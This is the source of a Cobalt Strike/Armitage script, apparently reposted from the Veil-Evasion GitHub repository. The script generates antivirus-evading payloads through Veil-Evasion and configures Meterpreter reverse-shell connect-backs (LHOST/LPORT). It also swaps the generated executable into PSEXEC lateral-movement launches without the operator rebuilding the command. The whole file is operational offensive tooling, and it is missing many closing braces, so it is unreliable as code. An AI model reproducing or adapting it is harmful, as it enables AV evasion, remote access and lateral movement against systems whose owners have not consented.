Veil-Evasion/veil_evasion.cna at master · Veil-Framework/Veil-Evasion
2019-06-22 01:04:59 Author:查看原文) 阅读量:174 收藏

# Invokes Veil-Evasion to generate AV-evading payloads.
# Payloads can be set to be substituted into PSEXEC
# calls on the fly.
# The configuration for a generated payload is preserved,
# even between Cobalt Strike/Armitage restarts.
# Double-clicking Payload or msfvenom will bring up
# appropriate options.
# Double-clicking LHOST will reset the LHOST variable to
# the local IP.
# Author: @harmj0y
# needed imports for custom menu creation
import java.awt.*; # for borderlayout
import javax.swing.*; # for jpanel
import javax.swing.table.*; #tablerowsorter
import table.*; # generictablemodel
import ui.*; #atable
global('$veilpath $psexecPayloadPath $version $veilpath %currentVeilPayload');
$psexecPayloadPath = "";
$veilpath = "";
# the currently selected payload
# format is:
# payload => "veil_payload"
# msfvenom => "windows/meterpreter/blah"
# lhost => ""
# lport => "4444"
# outputbase => "payload"
# overwrite => true
# psexec => false
%currentVeilPayload = %();
# "Main" event triggers
on ready {
global('$veilpath %currentVeilPayload');
$veilpath = data_list("veilpath")[0];
# if there's no existing veilpath set, prompt for it
# and save it back to the database
if (!$veilpath){
# if we get a null veil_evasion version, prompt
$veil_evasion_version = get_veil_evasion_version();
if ($veil_evasion_version eq ""){
# check the version again, exit if empty
$veil_evasion_version = get_veil_evasion_version();
if ($veil_evasion_version eq ""){
println("[!] Please install Veil-Evasion!");
# restore the current payload configuration from the database
%currentVeilPayload = data_list("currentVeilPayload")[0];
println("[*] Current path: $veilpath");
println("[+] Veil-Evasion v$veil_evasion_version Loaded");
# catches user-launched psexec actions so we can modify-in-place
filter user_launch {
# variable $2 -> the module launched by the user
# variable $3 -> the options for the module, including ['PAYLOAD']
# catch the two psexec launches and modify them to use Veil
if ($2 eq "windows/smb/psexec") {
# handle "windows/local/current_user_psexec" ?
local('$payloadpath $payload_server_path');
if ($psexecPayloadPath ne ""){
# if a custom EXE is not specified, use our Veil payload
if ($3['EXE::Custom'] eq ""){
$payloadpath = $psexecPayloadPath;
# mark this file for deletion later when Cortana exits
# upload the .exe to the server
$payload_server_path = file_put($payloadpath);
# make sure a payload path was returned
if ($payloadpath ne ""){
# swap options in place.
println("[*] Substituting in psexec payload: $payload_server_path");
$3['EXE::Custom'] = $payload_server_path;
# return all of our arguments
return @_;
# User interaction methods.
# prompt the user to choose which listener to use to
# generate the Veil payload
sub prompt_listener {
local('@raw_data @raw_listeners @listeners');
@raw_data = data_list("cloudstrike.listeners");
@raw_listeners = split('!!', @raw_data[0]);
@listeners = @();
foreach $raw_listener (@raw_listeners) {
if ($raw_listener ne "") {
local('$name $payload $port $migrate $null $null $domains %beacon %listener');
($name, $payload, $port, $migrate, $null, $null, $domains) = split('@@', $raw_listener);
$s = size(split('@@', $raw_listener));
# if we have a beacon listener
if ($s == 7){
($name, $payload, $port, $migrate, $host1, $host2, $host3) = split('@@', $raw_listener);
%beacon = %(name => $name, payload => $payload, host => $host1, port => $port);
push(@listeners, %beacon);
# otherwise a meterpreter listener
else {
($name, $payload, $port, $migrate, $host, $null) = split('@@', $raw_listener);
%listener = %(name => $name, payload => $payload, host => $host, port => $port);
push(@listeners, %listener);
prompt_list("Listener to Use", @("Use", "Cancel"), @('name', 'payload', 'host', 'port'), @listeners, 900, 800);
# prompt the user for their Veil install path and
# save the results back into the database
sub prompt_veil_path {
$veilpath = prompt_text("Enter path to", "/root/Veil/Veil-Evasion/");
# clear out the veilpath in the DB
# refresh the veilpath in the DB
data_add("veilpath", $veilpath);
# choose a particular Veil payload from a dynamically generate
# list and fill in the value into the calling table
sub chooseVeilPayload {
# TODO: redo the local variables
local('$cmd $handle @out $setPsexec @payloads $a $trimmed');
# Veil command to list all payloads
$cmd = $veilpath." -p";
$handle = exec($cmd);
@out = readAll($handle);
$setPsexec = $1;
@payloads = @();
# read Veil's output and parse out each payload, adding it to the array
foreach $line (@out){
if (($line hasmatch "\\)") && ($line !hasmatch "powershell") && ($line !hasmatch "native")){
$a = substr($line, find($line, '\t', 2));
# trim out leading/trailing whitespace
$trimmed = replace($a, '\s', '');
push(@payloads, %(payload => $trimmed));
# first col argument -> data that's returned when "select" is chosen
quickListDialog("Choose a Payload", "Select", @("payload", "payload"), @payloads, $width => 350, $height => 240, lambda({
[$call : $1];
}, $call => $4), \$tablef);
# choose a particular msfvenom from a list and fill
# the value into the calling table
sub chooseMSFVenom {
@msfvenom = @(
%(msfvenom => "windows/meterpreter/reverse_tcp"),
%(msfvenom => "windows/meterpreter/reverse_http"),
%(msfvenom => "windows/meterpreter/reverse_https"),
%(msfvenom => "windows/meterpreter/reverse_ipv6_tcp"),
%(msfvenom => "windows/meterpreter/reverse_ipv6_http"),
%(msfvenom => "windows/meterpreter/reverse_ipv6_https"),
%(msfvenom => "windows/shell/reverse_tcp"),
%(msfvenom => "")
# first col argument -> data that's returned when "select" is chosen
quickListDialog("Choose a MSFVenom", "Select", @("msfvenom", "msfvenom"), @msfvenoms, $width => 350, $height => 240, lambda({
[$call : $1];
}, $call => $4), \$tablef);
# Main user-interaction dialog
# adapted from armitage/scripts/
# thanks for the bsd license raffi :)
sub veil_dialog {
local('$center $south $c $x $generateButton');
# main title and dimensions of the dialog box
$dialog = dialog("Veil-Evasion", 590, 280);
# if there isn't a last-generated veil payload, throw some defaults in
if (!%currentVeilPayload){
%currentVeilPayload["payload"] = "python/shellcode_inject/aes_encrypt";
%currentVeilPayload["msfvenom"] = "windows/meterpreter/reverse_tcp";
%currentVeilPayload["lhost"] = lhost();
%currentVeilPayload["lport"] = 4444;
%currentVeilPayload["outputbase"] = "payload";
%currentVeilPayload["overwrite"] = true;
%currentVeilPayload["psexec"] = false;
# build out the option list table for the specified payload
$model = [new GenericTableModel: @("Option", "Value"), "Option", 128];
[$model setCellEditable: 1];
[$model _addEntry: %(Option => "Payload", Value => %currentVeilPayload["payload"], Tooltip => "Veil-Evasion Payload", Hide => '0')];
[$model _addEntry: %(Option => "MSFVenom", Value => %currentVeilPayload["msfvenom"], Tooltip => "msfvenom to use (if applicable)", Hide => '0')];
[$model _addEntry: %(Option => "LHOST", Value => %currentVeilPayload["lhost"], Tooltip => "LHOST to connect back to", Hide => '0')];
[$model _addEntry: %(Option => "LPORT", Value => %currentVeilPayload["lport"], Tooltip => "LPORT to connect back to", Hide => '0')];
[$model _addEntry: %(Option => "OutputBase", Value => %currentVeilPayload["outputbase"], Tooltip => "Base name for generated payloads", Hide => '0')];
$table = [new ATable: $model];
# add in the handler to manage clicks on each option
valueListener($table, $model);
# set up the panes
$center = [new JScrollPane: $table];
$south = [new JPanel];
[$south setLayout: [new BoxLayout: $south, [BoxLayout Y_AXIS]]];
# [$south setLayout: [new GridLayout: 3, 1]]; # original -> more rows
[$south setLayout: [new GridLayout: 3, 1]];
$c = [new JPanel];
[$c setLayout: [new FlowLayout: [FlowLayout CENTER]]];
# our buttons
$generateButton = [new JButton: "Generate"];
$listenerButton = [new JButton: "Use Listener"];
# overwrite checkbox
$overwriteCheckbox = [new JCheckBox: " Overwrite Payloads"];
if (%currentVeilPayload["overwrite"]){
[$overwriteCheckbox setSelected: 1];
[$overwriteCheckbox setSelected: 0];
# psexec checkbox
$psexecCheckbox = [new JCheckBox: " Set as PSEXEC Payload"];
if (%currentVeilPayload["psexec"]){
[$psexecCheckbox setSelected: 1];
[$psexecCheckbox setSelected: 0];
# add a lambda listener to trigger the generation of our Veil payload
[$generateButton addActionListener: lambda({
$options = %();
# grab all the filled in option values from the table
for ($x = 0; $x < [$model getRowCount]; $x++) {
$options[ [$model getValueAt: $x, 0] ] = [$model getValueAt: $x, 1];
# kick off out payload generation
# checkbox values => [$overwriteCheckbox isSelected]
generatePayload($options["Payload"], $options["MSFVenom"], $options["LHOST"], $options["LPORT"], $options["OutputBase"], [$overwriteCheckbox isSelected], [$psexecCheckbox isSelected]);
[$dialog setVisible: 0]; # close the dialog off
# fire off the listener prompt
[$listenerButton addActionListener: lambda({
[$dialog setVisible: 0]; # close the dialog off
# add the buttons to the frame
[$c add: $generateButton];
[$c add: $listenerButton];
# add the southern frame that contains the action buttons
[$south add: left($overwriteCheckbox)];
[$south add: left($psexecCheckbox)];
[$south add: $c];
$s = [new JSplitPane: [JSplitPane VERTICAL_SPLIT], $north, $center];
[$center setPreferredSize: [new Dimension: 0, 0]];
# [$north setPreferredSize: [new Dimension: 590, 30]]; # description area
[$s resetToPreferredSizes];
[$s setOneTouchExpandable: 1];
[$dialog add: $s, [BorderLayout CENTER]];
[$dialog add: $south, [BorderLayout SOUTH]];
[$generateButton requestFocus];
[$dialog setVisible: 1];
# Payload generation.
# build the Veil command to execute and return the
# path of the payload .exe
# arguments ->
# $1 : lhost
# $2 : lport
# $3 : the specified payload
# $4 : the output base name
# $5 : the msfvenom
# $6 : whether to overwrite
# $7 : whether we're doing this for psexec, true/false
sub generatePayload {
local('$payload $msfvenom $lhost $lport $outputbase $overwrite $usePsexec $veilcmd @out $handle $line $payloadpath');
global('$veilpath $psexecPayloadPath %currentVeilPayload');
$payload = $1;
$msfvenom = $2;
$lhost = $3;
$lport = $4;
$outputbase = $5;
$overwrite = $6;
$usePsexec = $7;
# set the current payload to these options and refresh the database
%currentVeilPayload["payload"] = $payload;
%currentVeilPayload["msfvenom"] = $msfvenom;
%currentVeilPayload["lhost"] = $lhost;
%currentVeilPayload["lport"] = $lport;
%currentVeilPayload["outputbase"] = $outputbase;
%currentVeilPayload["overwrite"] = $overwrite;
%currentVeilPayload["psexec"] = $usePsexec;
refreshCurrentPayload(); # refresh the DB
# default to a meterpreter payload
$veilcmd = $veilpath." -p $payload -c LHOST=$lhost LPORT=$lport -o $outputbase";
# if we have a shellcode payload, use this command instead
if($payload hasmatch "shellcode"){
$veilcmd = $veilpath." -p $payload --msfvenom $msfvenom --msfoptions LHOST=$lhost LPORT=$lport PrependMigrate=true -o $outputbase";
# check if we're overwrite the produced payload
if ($overwrite){
$veilcmd = $veilcmd . " --overwrite"
# execute the Veil command and get the path of .exe generated
println("[*] Executing Veil command: \"$veilcmd\"");
$handle = exec($veilcmd);
@out = readAll($handle);
$payloadpath = "";
# read Veil's output and try to parse out the .exe path
foreach $line (@out){
if (find($line, 'Executable written to')){
$payloadpath = substr($line, indexOf($line, "/"), lindexOf($line, "exe") ) ."exe";
# $saveto = prompt_file_save("payload.exe"); ?
# show_message("output: $payloadpath", "Veil-Evasion");
prompt_text("output:", $payloadpath);
# if we're using this for psexec, set everything up for substitution
if ($usePsexec){
$psexecPayloadPath = $payloadpath;
# Menu Modifications
menubar("Veil-Evasion", "veilinterface", 2);
# modify the main "Attacks" menu
popup veilinterface {
item "Generate" {
item "Current PSEXEC Payload" {
# clear out the text if you want to clear the psexec payload used
$psexecPayloadPath = prompt_text("Current PSEXEC Payload:", $psexecPayloadPath);
item "Set Veil-Evasion Path" {
# Misc helpers
# try to extract the version number from Veil-Evasion
sub get_veil_evasion_version {
local('$cmd $handle @out $trimmed $version');
$version = "?";
# Veil command to list all payloads
$cmd = $veilpath." -p";
$handle = exec($cmd);
@out = readAll($handle);
# extract the version number, if possible
foreach $line (@out){
if (find($line, 'Version')){
$version = substr($line, find($line, ':') + 2);
return $version;
# clear out the database object and put the current
# payload object in
sub refreshCurrentPayload {
# clear out the DB value
# refresh the current veil payload in the DB
data_add("currentVeilPayload", %currentVeilPayload);
# adapted from addFileListener() in armitage/scripts/
# listener method for when an option is double clicked in the
# main dialoag menu
sub valueListener {
local('$table $model $actions');
($table, $model, $actions) = @_;
if ($actions is $null) {
$actions = %();
# when LHOST is clicked, revert back to lhost() value
$actions["LHOST"] = { [$4: lhost()]; };
# set our lambdas functions for when these values are clicked
$actions["Payload"] = lambda(&chooseVeilPayload);
$actions["MSFVenom"] = lambda(&chooseMSFVenom);
# helping logic for mouse interaction
addMouseListener($table, lambda({
if ($0 eq 'mouseClicked' && [$1 getClickCount] >= 2) {
local('$type $row $action $change $value');
$value = [$model getSelectedValueFromColumn: $table, "Value"];
$type = [$model getSelectedValueFromColumn: $table, "Option"];
$row = [$model getSelectedRow: $table];
# look for a direct match first
foreach $action => $change ($actions) {
if ($action eq $type) {
[$change: $type, $value, $row, lambda({
[$model setValueAtRow: $row, "Value", "$1"];
[$model fireListeners];
}, \$model, \$row)];
# fall back to looking for a wildcard match
foreach $action => $change ($actions) {
if ($action iswm $type) {
[$change: $type, $value, $row, lambda({;
[$model setValueAtRow: $row, "Value", "$1"];
[$model fireListeners];
}, \$model, \$row)];
}, \$model, \$table, \$actions));
# called by "prompt_list" when a user selects a button
on item_selected {
# prompt_listener(), set the handler as passed
if ($1 eq "Use"){
# prompt the veil_dialog from the listener information
# do some logic to set values based on the listener specified
# and then call the veil_dialog prompt
sub dialog_from_listener {
local('@listener $name $payload $lhost $lport');
@listener = $1;
# make sure we were passed a listener
if (size(@listener) > 0){
($name, $payload, $lhost, $lport) = @listener;
# logic to try to set specific options for various listeners
if (find($payload, 'reverse_tcp')) {
%currentVeilPayload["payload"] = "c/meterpreter/rev_tcp_service";
%currentVeilPayload["msfvenom"] = "n/a";
%currentVeilPayload["lhost"] = $lhost;
%currentVeilPayload["lport"] = $lport;
%currentVeilPayload["outputbase"] = "psexec";
%currentVeilPayload["overwrite"] = true;
%currentVeilPayload["psexec"] = true;
else if (find($payload, 'reverse_https')) {
%currentVeilPayload["payload"] = "python/shellcode_inject/aes_encrypt";
%currentVeilPayload["msfvenom"] ="windows/meterpreter/reverse_https";
%currentVeilPayload["lhost"] = $lhost;
%currentVeilPayload["lport"] = $lport;
%currentVeilPayload["outputbase"] = "psexec";
%currentVeilPayload["overwrite"] = true;
%currentVeilPayload["psexec"] = true;
else if (find($payload, 'reverse_http')) {
%currentVeilPayload["payload"] = "python/shellcode_inject/aes_encrypt";
%currentVeilPayload["msfvenom"] ="windows/meterpreter/reverse_http";
%currentVeilPayload["lhost"] = $lhost;
%currentVeilPayload["lport"] = $lport;
%currentVeilPayload["outputbase"] = "psexec";
%currentVeilPayload["overwrite"] = true;
%currentVeilPayload["psexec"] = true;
show_message("Warning: listener not currently supported!");
# GUI Helper Methods
# these are all from armitage/scripts/
# creates a list dialog, from armitage/scripts/
# $1 = title, $2 = button text, $3 = columns, $4 = rows, $5 = callback
sub quickListDialog {
local('$dialog $panel $table $row $model $button $sorter $after $a $tablef');
$dialog = dialog($1, $width, $height);
$panel = [new JPanel];
[$panel setLayout: [new BorderLayout]];
($table, $model) = setupTable($3[0], sublist($3, 1), $4);
[$panel add: [new JScrollPane: $table], [BorderLayout CENTER]];
if ($tablef !is $null) {
[$tablef: $table, $model];
$button = [new JButton: $2];
[$button addActionListener: lambda({
[$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model];
[$dialog setVisible: 0];
}, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])];
$south = [new JPanel];
[$south setLayout: [new BoxLayout: $south, [BoxLayout Y_AXIS]]];
if ($after !is $null) {
foreach $a ($after) {
[$south add: $a];
[$south add: center($button)];
[$panel add: $south, [BorderLayout SOUTH]];
[$dialog add: $panel, [BorderLayout CENTER]];
[$dialog show];
[$dialog setVisible: 1];
# from armitage/scripts/
sub setupTable {
local('$table $model $sorter $row $index $col');
$model = [new GenericTableModel: $2, $1, 8];
foreach $row ($3) {
[$model _addEntry: $row];
$table = [new ATable: $model];
[[$table getSelectionModel] setSelectionMode: [ListSelectionModel SINGLE_SELECTION]];
$sorter = [new TableRowSorter: $model];
[$table setRowSorter: $sorter];
# make sure our columns have sorters that make sense
foreach $index => $col ($2) {
if ($col eq "session_host" || $col eq "host" || $col eq "Host") {
[$sorter setComparator: $index, &compareHosts];
else if ($col eq "port" || $col eq "sid" || $col eq "Port") {
[$sorter setComparator: $index, { return $1 <=> $2; }];
return @($table, $model);
# from armitage/scripts/
sub center {
local('$panel $c');
$panel = [new JPanel];
[$panel setLayout: [new FlowLayout: [FlowLayout CENTER]]];
foreach $c (@_) {
[$panel add: $c];
return $panel;
# from armitage/scripts/
sub left {
local('$panel $c');
$panel = [new JPanel];
[$panel setLayout: [new FlowLayout: [FlowLayout LEFT]]];
foreach $c (@_) {
[$panel add: $c];
return $panel;
# from armitage/scripts/
sub syncTable {
if ([$1 isEditing]) {
[[$1 getCellEditor] stopCellEditing];
# helper, from armitage/scripts/
sub addMouseListener {
[$1 addMouseListener: [new SafeMouseListener: $2]];
# helper, from armitage/scripts/
sub dialog {
$dialog = [new JDialog: $__frame__, $1];
[$dialog setSize: $2, $3];
[$dialog setLayout: [new BorderLayout]];
[$dialog setLocationRelativeTo: $__frame__];
return $dialog;
# helpers, from armitage/scripts/
sub tableRenderer {
return [ATable getDefaultTableRenderer: $1, $2];
